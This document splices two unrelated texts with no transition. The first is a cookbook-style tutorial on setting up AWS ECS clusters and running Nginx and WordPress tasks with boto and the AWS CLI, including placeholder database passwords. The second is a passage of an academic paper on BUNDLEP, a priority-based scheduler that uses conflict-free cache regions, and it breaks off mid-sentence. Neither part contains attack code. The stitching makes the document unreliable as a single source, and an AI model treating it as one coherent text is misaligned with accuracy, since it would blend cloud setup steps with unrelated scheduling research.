Install Boto, copy *.aws/config* to *.aws/credentials*, clone the repository, and execute the script:

```
$ git clone https://github.com/how2dock/docbook.git
$ sudo pip install boto
$ cp ~/.aws/config ~/.aws/credentials
$ cd docbook/ch08/ecs
$ ./ecs-policy.py
```

This script creates an ecs role, an ecspolicy policy, and a cookbook instance profile.
You can edit the script to change these names. After completion, you should see the role and the policy in the IAM console. **See Also** - Video of an ECS demo Creating an ECS Cluster Problem You are set up to use ECS (see “Setting Up to Use the EC2 Container Service” on page 30). Now you want to create a cluster and some instances in it to run containers. Solution Use the AWS CLI that you installed in “Setting Up to Use the EC2 Container Service” on page 30 and explore the new ECS API. In this recipe, you will learn to use the following: - `aws ecs list-clusters` - `aws ecs create-cluster` - `aws ecs describe-clusters` - `aws ecs list-container-instances` - `aws ecs delete-cluster` By default, you have one cluster in ECS, but until you have launched an instance in that cluster, it is not active. Try to describe the default cluster: ``` $ aws ecs describe-clusters ``` Currently you are limited to two ECS clusters. To activate this cluster, launch an instance using Boto. The AMI used is specific to ECS and contains the ECS agent. You need to have created an SSH key pair to ssh into the instance, and you need an instance profile associated with a role that has the ECS policy (see “Setting Up to Use the EC2 Container Service” on page 30): ``` $ python ... >>> import boto >>> c = boto.connect_ec2() >>> c.run_instances('ami-34ddbe5c', key_name='ecs', instance_type='t2.micro', instance_profile_name='cookbook') ``` With one instance started, wait for it to run and register in the cluster. Then if you describe the cluster again, you will see that the default cluster has switched to active state. 
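The "wait for it to run and register" step is easy to script as a poll loop. The sketch below uses a placeholder `cluster_is_active` callable instead of a real `boto` or `aws ecs describe-clusters` call, so the retry logic itself is what's illustrated:

```python
import time

def wait_until(predicate, timeout=300, interval=5):
    """Poll predicate() until it returns True or timeout (seconds)
    elapses; return True on success, False on timeout."""
    deadline = time.time() + timeout
    while time.time() < deadline:
        if predicate():
            return True
        time.sleep(interval)
    return False

# In practice the predicate would call the ECS API (e.g., via boto)
# and check that the cluster status is "ACTIVE". Placeholder:
def cluster_is_active():
    return True

print(wait_until(cluster_is_active, timeout=10, interval=1))
# -> True
```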
You can also list container instances:

```
$ aws ecs describe-clusters
-------------------------------
|      DescribeClusters       |
+-----------------------------+
||         clusters          ||
|+---------------------------+
||  activeServicesCount      ||
||  clusterArn               ||
||  clusterName              ||
||  pendingTasksCount        ||
||  registeredContainer...   ||
||  runningTasksCount        ||
||  status                   ||
|+---------------------------+
```

```
$ aws ecs list-container-instances
----------------------------------------
|        ListContainerInstances        |
+--------------------------------------+
||        containerInstanceArns       ||
|+------------------------------------+|
||  arn:aws:ecs:us-east-1::container... ||
|+------------------------------------+|
```

Starting additional instances increases the size of the cluster:

```
$ aws ecs list-container-instances
----------------------------------------
|        ListContainerInstances        |
+--------------------------------------+
||        containerInstanceArns       ||
|+------------------------------------+|
```

Since these container instances are regular EC2 instances, you will see them in your EC2 console. If you have set up an SSH key properly and opened port 22 on the security group used, you can also ssh to them:

```
$ ssh -i ~/.ssh/id_rsa_ecs ec2-user@52.1.224.245
...
   Amazon ECS-Optimized Amazon Linux AMI

Image created: Thu Dec 18 01:39:14 UTC 2014
PREVIEW AMI

9 package(s) needed for security, out of 10 available
Run "sudo yum update" to apply all updates.

[ec2-user@ip-172-31-33-78 ~]$ docker ps
CONTAINER ID   IMAGE                            ...
4bc4d480a362   amazon/amazon-ecs-agent:latest   ...
```

```
[ec2-user@ip-10-0-0-92 ~]$ docker version
Client version: 1.7.1
Client API version: 1.19
Go version (client): go1.4.2
Git commit (client): 786b29d/1.7.1
OS/Arch (client): linux/amd64
Server version: 1.7.1
Server API version: 1.19
Go version (server): go1.4.2
Git commit (server): 786b29d/1.7.1
OS/Arch (server): linux/amd64
```

You see that the container instance is running Docker and that the ECS agent is a container. The Docker version that you see will most likely be different, as Docker releases a new version approximately every two months.

Discussion

Although you can use the default cluster, you can also create your own:

```bash
$ aws ecs create-cluster --cluster-name cookbook
--------------------------------------------------------
|                     CreateCluster                    |
+------------------------------------------------------+
||                       cluster                      ||
|+------------------------------+-------------+--------+|
||          clusterArn          | clusterName | status ||
|+------------------------------+-------------+--------+|
||  arn:aws:...:cluster/cookbook|  cookbook   | ACTIVE ||
|+------------------------------+-------------+--------+|
$ aws ecs list-clusters
---------------------------------------------------------
|                      ListClusters                     |
+-------------------------------------------------------+
||                     clusterArns                     ||
|+-----------------------------------------------------+|
||  arn:aws:ecs:us-east-1:587264368683:cluster/cookbook ||
||  arn:aws:ecs:us-east-1:587264368683:cluster/default  ||
|+-----------------------------------------------------+|
```

To launch instances in that freshly created cluster instead of the default one, you need to pass some user data during the instance creation step.
Via Boto, this can be achieved with the following script:

```python
#!/usr/bin/env python

import base64

import boto

# Cloud-init user data that registers the instance in the
# "cookbook" cluster instead of the default one.
userdata = """#!/bin/bash
echo ECS_CLUSTER=cookbook >> /etc/ecs/ecs.config
"""

c = boto.connect_ec2()
c.run_instances('ami-34ddbe5c',
                key_name='ecs',
                instance_type='t2.micro',
                instance_profile_name='cookbook',
                user_data=base64.b64encode(userdata))
```

Once you are done with the cluster, you can delete it entirely with the `aws ecs delete-cluster --cluster cookbook` command.

Starting Docker Containers on an ECS Cluster

Problem

You know how to create an ECS cluster on AWS (see “Creating an ECS Cluster” on page 33), and now you are ready to start containers on the instances forming the cluster.

Solution

Define your containers or group of containers in a definition file in JSON format. This will be called a task. You will register this task and then run it; it is a two-step process. Once the task is running in the cluster, you can list, stop, and start it.

For example, to run Nginx in a container based on the nginx image from Docker Hub, you create the following task definition in JSON format:

```json
[
  {
    "environment": [],
    "name": "nginx",
    "image": "nginx",
    "cpu": 10,
    "portMappings": [
      {
        "containerPort": 80,
        "hostPort": 80
      }
    ],
    "memory": 10,
    "essential": true
  }
]
```

You can notice the similarities between this task definition, a Kubernetes Pod, and a Docker Compose file. To register this task, use the ECS `register-task-definition` call. Specify a family that groups the tasks and helps you keep revision history, which can be handy for rollback purposes. To start the container in this task definition, you use the `run-task` command and specify the number of containers you want running.
To stop the container, you stop the task, specifying it via its task UUID obtained from `list-tasks`, as shown here:

```bash
$ aws ecs run-task --task-definition nginx:1 --count 1
$ aws ecs stop-task --task 6223f2d3-3689-4b3b-a110-ea128350adb2
```

ECS schedules the task on one of the container instances in your cluster. The image is pulled from Docker Hub, and the container started using the options specified in the task definition. At this preview stage of ECS, finding the instance where the task is running and finding the associated IP address isn’t straightforward. If you have multiple instances running, you will have to do a bit of guesswork. There does not seem to be a proxy service as in Kubernetes either.

**Discussion**

The Nginx example represents a task with a single container running, but you can also define a task with linked containers. The task definition reference describes all possible keys that can be used to define a task. To continue with our example of running WordPress with two containers (a `wordpress` one and a `mysql` one), you can define a `wordpress` task. It is similar to converting a Compose definition file to the AWS ECS task definition format. It will not go unnoticed that a standardization effort among `compose`, `pod`, and `task` would benefit the community.
```json
[
  {
    "image": "wordpress",
    "name": "wordpress",
    "cpu": 10,
    "memory": 500,
    "essential": true,
    "links": [
      "mysql"
    ],
    "portMappings": [
      {
        "containerPort": 80,
        "hostPort": 80
      }
    ],
    "environment": [
      {
        "name": "WORDPRESS_DB_NAME",
        "value": "wordpress"
      },
      {
        "name": "WORDPRESS_DB_USER",
        "value": "wordpress"
      },
      {
        "name": "WORDPRESS_DB_PASSWORD",
        "value": "wordpresspwd"
      }
    ]
  },
  {
    "image": "mysql",
    "name": "mysql",
    "cpu": 10,
    "memory": 500,
    "essential": true,
    "environment": [
      {
        "name": "MYSQL_ROOT_PASSWORD",
        "value": "wordpressdocker"
      },
      {
        "name": "MYSQL_DATABASE",
        "value": "wordpress"
      },
      {
        "name": "MYSQL_USER",
        "value": "wordpress"
      },
      {
        "name": "MYSQL_PASSWORD",
        "value": "wordpresspwd"
      }
    ]
  }
]
```

The task is registered the same way as done previously with Nginx, but you specify a new family. When the task is run, however, it could fail due to constraints not being met. In this example, my container instances are of type t2.micro with 1GB of memory. Since the task definition is asking for 500 MB for wordpress and 500 MB for mysql, there’s not enough memory for the cluster scheduler to find an instance that matches the constraints, and running the task fails:

```bash
$ aws ecs register-task-definition --family wordpress \
    --cli-input-json file://$PWD/wordpress.json
$ aws ecs run-task --task-definition wordpress:1 --count 1
------------------------------------------------------------
|                         failures                         |
+------------------------------------------+---------------+
|                    arn                   |     reason    |
+------------------------------------------+---------------+
|  arn:aws:ecs::container-instance/...     |RESOURCE:MEMORY|
|  arn:aws:ecs::container-instance/...     |RESOURCE:MEMORY|
|  arn:aws:ecs::container-instance/...     |RESOURCE:MEMORY|
+------------------------------------------+---------------+
```

You can edit the task definition, relax the memory constraint, and register a new task in the same family (revision 2). It will successfully run.
If you log into the instance running this task, you will see the containers running alongside the ECS agent: ```bash $ ssh -i ~/.ssh/id_rsa_ecs ec2-user@54.152.108.134 ... ...[ec2-user@ip-172-31-36-83 ~]$ docker ps CONTAINER ID IMAGE ... NAMES 36d590a206df wordpress:4 ... ecs-wordpress... 893d1bd24421 mysql:5 ... ecs-wordpress... 81023576f81e amazon/amazon-ecs ... ecs-agent ``` Enjoy ECS and keep an eye on improvements and general availability. See Also - Task definition reference
BUNDLEP: Prioritizing Conflict Free Regions in Multi-Threaded Programs to Improve Cache Reuse Corey Tessler Wayne State University corey.tessler@wayne.edu Nathan Fisher Wayne State University fishern@wayne.edu Abstract—In "BUNDLE: Real-Time Multi-Threaded Scheduling to Reduce Cache Contention", Tessler and Fisher propose a scheduling mechanism and combined worst-case execution time calculation method that treats the instruction cache as a beneficial resource shared between threads. Object analysis produces a worst-case execution time bound and separates code segments into regions. Threads are dynamically placed in bundles associated with regions at run time by the BUNDLE scheduling algorithm, where they benefit from shared cache values. In the evaluation of the previous work, tasks were created with a predetermined worst-case execution time path through the control flow graph. A priori knowledge of the worst-case path is an impractical restriction on any analysis. At the time, the only other solution available was an all-paths search of the graph, which is an equally impractical approach due to its complexity. The primary focus of this work is to build upon BUNDLE, expanding its applicability beyond a proof of concept. We present a complete worst-case execution time calculation method that includes thread-level context switch costs, operating on real programs with representative architecture parameters, and we compare our results to those produced by Heptane's state-of-the-art method. To these ends, we propose a modification to the BUNDLE scheduling algorithm called BUNDLEP. Bundles are assigned priorities that enforce an ordered flow of threads through the control flow graph – avoiding the need for multiple all-paths searches through the graph. In many cases, our evaluation shows a run-time and analytical benefit for BUNDLEP compared to serialized thread execution and state-of-the-art WCET analysis. I.
INTRODUCTION For hard real-time systems, cache memory complicates the calculation of a task's worst-case execution time (WCET) bound [1]–[4]. An architecture that includes an instruction cache creates the possibility of (at least) two execution times for every instruction. Executing an instruction from the cache, a cache hit, typically takes less time than executing an instruction that must be fetched from main memory (a cache miss). For hierarchical caches, the multiple loading times from one level to another increase the diversity of execution times per instruction. Previous work preceding BUNDLE [5] accounts for variations in these execution times due to tasks sharing a single cache by extending the execution times of the preempted or preempting task [2], [6]–[8]. BUNDLE moves away from the classical (negative) perspective of caches by treating the cache as a benefit to multi-threaded hard real-time tasks. It comprises two parts: a worst-case execution time with cache overhead (WCETO) analysis and a scheduling algorithm. The analysis leverages BUNDLE's thread-level scheduling algorithm in calculating a bound which includes the cache benefit between threads. In addition, the analysis identifies conflict free regions used to make scheduling decisions. As a first work, the evaluation in BUNDLE [5] served as a proof of concept, demonstrating the potential benefit in WCETO and run-time savings. For WCETO calculations, it described an all-paths walk with complexity $O((|V|!)^m)$ for $|V|$ conflict free regions and $m$ threads. The evaluation subverted this bound by construction of synthetic programs with a known set of worst-case execution paths. Synthetic tasks, all-paths walks, and prior knowledge of their worst-case paths are barriers to BUNDLE's practical application and acceptance. The primary goal of this work is to provide a suitable WCETO calculation method and run-time evaluation for BUNDLE scheduling that can be compared to the classical approach.
The following contributions are made to reach these goals: - A method for calculating conflict free regions (CFRs) where instructions participate in exactly one CFR. - A BUNDLE-based scheduling algorithm that prioritizes conflict free regions, named BUNDLEP. - A suitable WCETO calculation method for BUNDLEP which incorporates context switch costs. - A complete evaluation and simulation environment based on the Heptane\(^1\) package, available for download [9].

The remainder of this work is structured as follows. Section II sets BUNDLE and BUNDLEP in the context of the related work. Section III summarizes the core concepts of BUNDLE and the background required for the extensions. Section IV gives a brief overview of BUNDLEP's approach in contrast to BUNDLE. Section V outlines the creation of conflict free regions. Section VI is divided into three subsections, describing the thread bottlenecks, priority assignment, and the BUNDLEP scheduling algorithm. Section VII details the WCETO method for BUNDLEP. Section VIII describes the evaluation method as a complement to Heptane, and the results. Our work concludes with final remarks and potential extensions in Section IX.

II. RELATED WORK

Other efforts have been made to mitigate or manage the cache impact of concurrent tasks. Memory-Centric Scheduling [10] is influenced by the cache impact of each task. However, it only supports PREM-compliant [11] tasks that have been divided into load and execution phases. Loading phases are isolated from one another, preventing an inter-thread cache benefit between them. Another approach to predictable cache behavior is taken by [12], using management techniques such as cache coloring and blocking. Cache reuse is increased for a single task, but the method does not accommodate cached values being shared between distinct threads or tasks. These are representative examples of the classical (negative) perspective of caches, in contrast to BUNDLE's positive view.

\(^1\) See https://team.inria.fr/alf/software/heptane
Aside from BUNDLE, the only works we are currently aware of taking a positive perspective on caches with respect to schedulability are related to Persistent Cache Blocks (PCBs) [13], [14] or cache spread [15]. PCBs are cache blocks that remain in the cache after a job completes, to be reused with the next release. However, PCBs are limited to a single task (or thread), and the analytical benefit is limited to subsequent jobs. Calandrino's [15] examination of cache spread is limited to empirical analysis, with a coarser-grained approach than BUNDLE.

III. SUMMARY OF BUNDLE

The motivation for BUNDLE stems from a positive perspective of caches in the setting of multi-threaded tasks on a shared processor. From this perspective, there is an inter-thread cache benefit when a thread encounters an unexpected cache hit due to the previous execution of a thread from the same task. Other concurrent approaches [16], [17] do not account for the benefit in their analysis due to their focus on finding the worst-case cache interleavings. Conversely, BUNDLE schedules threads to avoid the worst case and creates a quantifiable benefit of cache reuse between threads. The sporadic model [18] is extended to support BUNDLE's thread-level scheduling algorithm and analysis. Each task \( \tau_i \) in the set of tasks \( \tau \) is represented by a tuple of minimum inter-arrival time, relative deadline, and initial ribbon: \( \tau_i = (p_i, d_i, R_i) \). A ribbon is the set of reachable instructions from a single entry instruction, described by a conflict free region graph \( R_i \). The initial ribbon of a task is a starting point for the first threads of execution released with each job. Due to the complexity of intra-task scheduling, BUNDLE's scheduling algorithm and analysis are limited to one processor and a single task\(^2\), with one ribbon, releasing \( m \) threads per job. Execution on the shared processor is aided by a single-level direct-mapped cache with \( l \) lines.
Loading a block from main memory to the cache takes \( \mathbb{B} \) cycles, with a uniform number of clock cycles per instruction (CPI). This paper is the first, implementation-based step towards our larger goal of bringing BUNDLE to a fully preemptive system-wide scheduler, with multiple tasks and hierarchical caches, on many cores. To quantify the inter-thread cache benefit, BUNDLE schedules threads in a manner cognizant of the program's structure as well as potential cache conflicts within and between threads. Central to BUNDLE's scheduling decisions and WCETO analysis are conflict free regions. Conflict free regions are created from the control flow graph [19] (CFG) of a ribbon. A control flow graph is a weakly connected directed graph representing the flows of execution through an executable object, described by a triple \( G = (N, E, h) \) of nodes, edges, and entry instruction. Typically the nodes \( n \in N \) of a CFG are basic blocks; for simplicity of presentation, nodes of CFGs within this work are single instructions. The directed edges \( (u, v) \in E \), with \( u, v \in N \), define the possible paths through the program, with \( h \in N \) at the root of all paths, ending in a single terminal node. A conflict free region (CFR) is a subset of nodes and edges from the CFG of a ribbon. The subset is determined by including instructions which, when executed, would not cause an eviction of each other. When a CFR is extracted from the CFG \( G \), the structure of the program is maintained. An extracted CFR is itself a CFG, denoted \( F = (N, E, h) \), with the following properties: 1) No two instructions (outside of the same block) map to the same cache line. 2) All instructions of \( F \) are weakly connected to the entry instruction \( h \). 3) For any two instructions \( u, v \) in \( F \), if there was an edge between them in \( G \) then \( (u, v) \in E \) (of \( F \)).
The set of CFRs of a ribbon's CFG are collected in the ribbon's conflict free region graph (CFRG). A CFRG \( R = (N, E, h) \) is a CFG where the nodes are CFRs. Connectivity between CFRs from the CFG is preserved in the edges of the CFRG. For an edge \( (n_1, n_2) \) in the CFG, if \( n_1 \) and \( n_2 \) are placed in distinct CFRs, then the CFRG must contain an edge between the CFRs. Figure 1 illustrates the relationships between the CFG, CFRs, and CFRG.

**Fig. 1:** CFG, CFR, and CFRG of a ribbon

It is the CFRG which drives the scheduling decisions of BUNDLE's algorithm. For each CFR within the CFRG, the scheduling algorithm creates a container for threads called a bundle. Only one bundle is active at any time, and only threads of the active bundle are allowed to execute. If a thread of the active bundle attempts to execute an instruction outside of the active CFR, the thread is blocked. After being blocked, the thread is placed in the bundle of the CFR it attempted to enter. After all threads of the active bundle have blocked, the bundle is depleted and another bundle is selected as active.

**Graphical Notation:** Execution under BUNDLE is illustrated in Figure 2. Annotation of the CFRG \( R = (N, E, h) \) will remain consistent with other figures. Nodes \( n_i \in N \) are CFRs, \( n_i = (N_i, E_i, h_i) \). The entry instruction \( h_i \) of CFR \( n_i \) has a main memory address, which is denoted \( a_i \). When presented as nodes in graphs, CFRs will be squares and instructions circles. When needed, the CFR shaded light gray indicates its bundle is active. Small black squares adjacent to or within a CFR are the threads of the associated bundle.

**Fig. 2:** BUNDLE Execution

In Figure 2a, \( n_0 \) is active.
Accordingly, BUNDLE executes each of \( n_0 \)'s threads until they leave the CFR, entering \( n_1 \) and \( n_2 \). The next active bundle selected is \( n_3 \) in Figure 2b; its one thread executes until termination. This process repeats until all threads have terminated and the job has been completed. By restricting execution by CFR (bundle), the execution time of threads is lowered by sharing cached values where they otherwise would not be shared (compared to, e.g., letting each thread complete the execution of the entire CFG before switching to the next thread). In BUNDLE [5], the selection of which bundle to activate is arbitrary. Selecting in such a manner can reduce the inter-thread cache benefit, which can be observed in Figure 2. Had \( n_1 \) and \( n_2 \) been activated before \( n_3 \), more threads would have received the benefit when \( n_3 \) was activated.

IV. OVERVIEW OF BUNDLEP

Arbitrary selection of bundle activation has the deleterious effect of increasing the complexity of WCETO analysis. BUNDLEP addresses both issues of increasing the inter-thread cache benefit and simplifying WCETO calculation with a single solution: assign priorities to the CFRs of the CFRG. At run time, a bundle inherits the priority of its associated CFR, and the bundle with the best priority is always activated.

**Fig. 3:** BUNDLEP Execution

Priorities are assigned to CFRs to guarantee the minimum number of activations, which maximizes the inter-thread cache benefit per activation. Priority assignments are based on the intuition that the terminal node of the CFRG should have the lowest priority. Those nodes immediately preceding the terminal node are given the second lowest, etc. This intuition is illustrated by example in Figure 3. CFRs have their priorities listed as superscripts, where the lowest value has the best priority, i.e., node \( n_1 \) has priority 1, which is worse than \( n_0 \). Figure 3 revisits the CFRG of Figure 2 to highlight the benefit of prioritizing CFRs.
Starting with 3a, the best priority CFR is selected as active (\( n_0 \)) and the bundle is depleted. BUNDLEP's next activation is a choice between \( n_1 \) and \( n_2 \); they have equal priority, so either would be a valid choice. The selection of \( n_2 \) is made before \( n_1 \). Figure 3b illustrates only the first choice, omitting the depiction of \( n_1 \)'s activation in favor of \( n_3 \). Figure 3c shows the clear benefit of priority assignment. The bundle for \( n_3 \) is activated only once for six threads; this maximizes the inter-thread cache benefit, which is equivalent to minimizing the number of activations. Compare Figure 2, where \( n_3 \) could be activated up to four times, possibly quadrupling the cache load penalty for the CFR at run time and during WCETO analysis. The priority assignment which minimizes the number of activations is shown in Theorem 1 to be the longest path value for each node of the CFRG from the initial node, given positive edge weights. This influences the creation of CFRs and the treatment of loops in the CFRG. As such, the CFRG must be a DAG, where the assignment of priorities to CFRs is performed in polynomial time with the added benefit of enabling a tractable WCETO analysis.

**Theorem 1 (Maximum Bundle Activations).** For a CFRG \( R = (N, E, h) \) which is a DAG, where each node \( n_i \in N \) has priority \( \pi_i \) equal to the length of the longest path from \( h \) to \( n_i \), the bundle \( n_i \) will be activated at most once per job using BUNDLEP.

**Proof.** Toward a contradiction, assume a CFR \( n_i \) is activated more than once. Then there must exist a node \( n_j \) with a worse priority (greater value) \( \pi_j > \pi_i \) on a valid path \( \langle h, ..., n_j, ..., n_i, ... \rangle \). Given that \( R \) is a DAG, there can be no path from \( n_i \) to \( n_j \).
Since priorities are assigned equal to the longest path from \( h \) to a node, then \( \pi_j < \pi_i \), contradicting \( \pi_j > \pi_i \). Therefore, \( n_i \) can be activated at most once.

V. CONFLICT FREE REGION CREATION

To ensure the CFRG of a ribbon is a DAG\(^3\), the process of converting a ribbon's executable object into a CFG, then CFRs, and finally a CFRG must avoid introducing ambiguity or loops into the CFG or CFRG. To do so, the process is divided into two stages: 1) create an expanded CFG, and 2) create and link CFRs. In Subsection V-A the motivation and definition of expanded CFGs is provided. Subsection V-B details the assignment of individual instructions to CFRs and their compilation into a CFRG.

A. Expanded Control Flow Graphs

Typically, for a CFG \( G = (N, E, h) \), a node \( n \in N \) is a basic block identified by the memory address of the first instruction of the block. In this work, nodes are individual instructions. However, nodes are not identified by their address. They are identified by their address and call stack. This prevents loops from being introduced into the CFG. Common to other hard real-time programs, ribbons are restricted from including infinite loops, function pointers, longjmps, or unbounded recursions. With these restrictions in place, it is still possible to create loops and ambiguity in the CFG of the ribbon, as illustrated by Figure 4.

\(^3\) A CFRG cannot be a DAG in the presence of user-defined loops; to maintain the DAG structure, loops are collapsed, as described in Section VI-C.

```
1 procedure a(x, y)
2     c = x
3     x = b(y)
4     y = b(2 + c)
5     return x + y
6 end procedure
```

Listing 1: Procedure a()

In Figure 4, Listing 1 is used to generate the two CFGs 4a and 4b. Numbers adjacent to lines in the pseudocode are the in-memory addresses of the statements. There are no cycles in the procedure; however, the CFG in 4a contains a cycle with \(b()\).
This is due to nodes of the CFG being identified by their address, coupled with two calls to \(b()\). The loop is broken in Figure 4b by identifying each node by the instruction's address and complete call stack. Identifying instructions in this way preserves the structure of the program without introducing loops into the CFG. Throughout the remainder of this work, all CFG operations take place over the expanded CFG of ribbons, where a node \(n \in N\) is identified by its address \(a\) and callstack \(s\) of depth \(k\), \(s = (n_1, n_2, ..., n_k)\). Each entry of the callstack is a node in \(N\), where the first entry is the top of the stack – the node calling \(n\)'s function. In the case of the first instruction \(h\) (and all other nodes reachable without a function call), the callstack has one element, \(\emptyset\), indicating no parenting call. Creating an expanded CFG from a ribbon is a straightforward modification of common CFG [20], [21] program analysis. As such, a detailed description of expanded CFG creation is omitted.

B. Conflict Free Region Assignment

A CFG serves as the basis of construction of conflict free regions and subsequently the conflict free region graph. In the previous work [5], a single node of the CFG could belong to multiple CFRs. Nodes of the CFG are excluded from participating in multiple CFRs under BUNDLEP. If nodes from the CFG participated in multiple CFRs, then loops could be introduced into the CFRG. Additionally, the WCETO calculation and scheduling decisions developed in this work rely upon nodes being assigned to exactly one CFR. Section III listed the three requirements of CFRs from [5]. A fourth requirement is added to accommodate BUNDLEP scheduling and WCETO calculation for a CFG \(G = (N, E, h)\) and CFRs \((F_1, F_2, ..., F_f)\) where \(F_i = (N_i, E_i, h_i)\): 4) A node \(n \in N\) is present in at most one CFR: \[ n \in N_i \implies \forall \ k \neq i, \ n \notin N_k \] Placing a node of the CFG in a single CFR is referred to as assignment.
The assignment process relies upon nodes of the expanded CFG being annotated with their call stack and inner-most loop head. A single node may participate in multiple loops (loops embedded within another). All loops have a head: a starting instruction that determines if the loop will repeat. The inner-most loop head of an instruction is the loop head closest to the node in the hierarchy of embedded loops it belongs to, identified by any suitable algorithm [22]. Assignment begins with a bi-level depth first search (DFS). The top-level DFS marks nodes of \(G\) as CFR entry points. The bottom-level DFS marks nodes with their CFR while handling the special cases that could create loops in the CFRG. Both use conflicts to bound their searches and return the set of conflicting nodes as successor nodes to continue the search. The coordinated result of the bi-level searches completes the first stage of assignment, called CFR entry tagging. The top-level DFS procedure TagCFRs() is presented as pseudocode in Algorithm 1. It makes use of a simulated cache \(C\) to identify conflicts, with three notable methods: \(C\).insert(a) caches \(a\)'s block, \(C\).clear() removes all blocks, and \(C\).conflicts(a) returns true if \(C\).insert(a) would evict a cached block.
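Such a simulated direct-mapped cache can be sketched as follows; this is an illustration rather than the paper's implementation, and mapping an address to a line by taking it modulo the line count is an assumption:

```python
class SimCache:
    """Simulated direct-mapped cache used only to detect conflicts."""

    def __init__(self, n_lines):
        self.n_lines = n_lines
        self.lines = {}                 # line index -> cached block address

    def insert(self, a):
        # Cache a's block in its direct-mapped line.
        self.lines[a % self.n_lines] = a

    def clear(self):
        # Remove all blocks.
        self.lines = {}

    def conflicts(self, a):
        # True if insert(a) would evict a different cached block.
        line = a % self.n_lines
        return line in self.lines and self.lines[line] != a
```

Re-inserting an already cached address is not a conflict; only a different address mapping to an occupied line is.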
#### Algorithm 1 TagCFRs()

```
G = (N, E, h)                  ▷ Expanded CFG G
C                              ▷ Simulated cache

procedure TagCFRs()
    s.clear()                  ▷ Local stack
    v.clear()                  ▷ Visited node array
    s.push(h)                  ▷ Starting condition
    while not s.empty() do
        n ← s.pop()            ▷ Take a node
        v[n] ← true            ▷ Mark the node as visited
        C.clear()              ▷ Reset the cache
        X ← LabelNodes(n)      ▷ Label CFR nodes
        for x ∈ X do
            s.push(x) if not v[x]   ▷ Conflict begins a CFR
        end for
    end while
    ▷ v[n] = true indicates n is a CFR entry.
end procedure
```

The TagCFRs() procedure is responsible for tracking the entry instructions of CFRs. It resembles a typical DFS, marking nodes as visited and adding them to the search list when they have not been visited. Where TagCFRs() differs is in the selection of subsequent nodes. In a typical DFS, the subsequent nodes are the immediate successors of the current node; in TagCFRs(), the subsequent nodes are the entry instructions of successive CFRs. Those entry instructions are determined by the LabelNodes() method.
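To make the bi-level search concrete, here is a rough Python sketch under simplifying assumptions (the function and parameter names are hypothetical, the simulated cache is reduced to a dictionary keyed by cache line, and the loop-related cases of LabelNodes() are omitted):

```python
def tag_cfrs(succ, addr, entry, n_lines):
    """Top-level DFS: find CFR entry points in a CFG.
    succ: node -> list of successor nodes
    addr: node -> memory address (addr % n_lines is its cache line)
    Returns (set of CFR entry nodes, node -> CFR-entry label map)."""
    entries, label = set(), {}
    stack = [entry]
    while stack:
        n = stack.pop()
        if n in entries:
            continue
        entries.add(n)
        conflicts = label_nodes(succ, addr, n, n_lines, label)
        stack.extend(x for x in conflicts if x not in entries)
    return entries, label

def label_nodes(succ, addr, n, n_lines, label):
    """Bottom-level DFS: label nodes of n's CFR; return the conflicting
    nodes, which become entry points of subsequent CFRs."""
    cache = {}                      # cache line -> address currently held
    conflicts, stack, seen = set(), [n], set()
    while stack:
        u = stack.pop()
        if u in seen:
            continue
        seen.add(u)
        line = addr[u] % n_lines
        if line in cache and cache[line] != addr[u]:
            conflicts.add(u)        # would evict: u starts a new CFR
            continue                # skip u's successors
        cache[line] = addr[u]
        label[u] = n                # u joins n's CFR
        stack.extend(succ[u])
    return conflicts
```

On a three-instruction chain with two cache lines, the third instruction evicts the first, so it begins a second CFR while the first two share one region.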
Since no CFR may contain a cache conflict, any instruction that would conflict must be the entry instruction of a subsequent CFR. Figure 5 provides an example call to LabelNodes(\(n_3\)): \(n_3\) is the entry instruction of the current CFR, and LabelNodes(\(n_3\)) returns the set of entry instructions for subsequent CFRs \(\{n_1, n_4, n_5\}\). Placed below each node in the figure is the cache block it maps to.

**Fig. 5:** Call to LabelNodes(\(n_3\)) Returning X

In addition to returning the entry instructions of subsequent CFRs, the LabelNodes() procedure is responsible for marking nodes of the CFG with the CFR they belong to. In Figure 5 the nodes \(\{n_3, n_4, n_5, n_6\}\) are labeled with their CFR \(n_3\). The pseudocode for LabelNodes() is given in Algorithm 2.

#### Algorithm 2 LabelNodes()

```
G = (N, E, h)      ▷ CFG G, shared with TagCFRs()
C                  ▷ Simulated cache, shared with TagCFRs()

procedure LabelNodes(n)
    s, x           ▷ Local stacks (not shared with TagCFRs())
    v              ▷ Local visited array (not shared with TagCFRs())
    if n.label ≠ ∅ then
        ℓ ← n.label                             ▷ Breaking an existing CFR
    end if
    s.push(n)
    while not s.empty() do
        u ← s.pop()
        if (n.isHead() and not n.inLoop(u))     ▷ Case 1, Loop Exit
           or (u.isHead() and u ≠ n)            ▷ Case 2, Loop Head
           or (u.label ≠ ∅ and u.label ≠ n)     ▷ Case 3, Assigned elsewhere
           or C.conflicts(u) then               ▷ Case 4, Cache Conflict
            x.push(u)                           ▷ Push the conflict
            v[u] ← true                         ▷ Skip u's successors
        else
            C.insert(u)
            u.label ← n                         ▷ u joins n's CFR
            s.push(w) for each unvisited successor w of u
        end if
    end while
    return x
end procedure
```

During each iteration of the DFS within LabelNodes(), a candidate node \(u\) is deemed within the CFR or an entry instruction of
a subsequent CFR. If \(u\) is within the CFR, the node is labeled with the CFR's initial instruction \(n\), and \(u\)'s successors are added to the search list \(s\). If \(u\) is an entry instruction, it is placed in the set of conflicts \(x\), and no successors of \(u\) are added to \(s\). When the search list is empty, the set of conflicts \(x\) is returned to the caller. There are four cases in \textsc{LabelNodes}() where the node \(u\) may be deemed a conflict. The simplest is Case 4, when \(u\) conflicts with another value present in the cache. Since CFRs must contain no conflicts, \(u\) cannot be added to the CFR \(n\). Cases 1 and 2 are related to loops. If \(u\) falls under Case 1, then \(n\) is a loop-head to which \(u\) does not belong. Since \(u\) was reachable from some instruction in the CFR \(n\), it must be an exit point of the loop and will not be permitted as part of the CFR. If \(u\) falls into Case 2, then \(u\) is a loop-head. Loops are collapsed (described in Section VI) to ensure the CFRG is a DAG. To permit collapsing, loop-heads must start CFRs, and CFRs must only contain instructions of the same loop. Case 3 provides two necessary forms of protection. The first is against loops being added to the CFRG (i.e., the fourth CFR requirement). The second is to prevent the nodes of a CFR becoming disconnected. For the WCETO method each CFR must have a single WCET path, which will not exist if the CFR is not weakly connected. Figure 6 compares the results with and without Case 3. Divided into four parts, Figure 6a is a snapshot of the CFRG from the \textsc{TagCFRs}() procedure's perspective after calling \textsc{LabelNodes}\((n_1)\) and before calling \textsc{LabelNodes}\((n_2)\); the top half is the CFG, the bottom half is the resulting CFRG. Figure 6b shows the result of calling \textsc{LabelNodes}\((n_2)\) without Case 3 in place, creating both a disconnected CFR \(n_1\) and a loop in the CFRG between 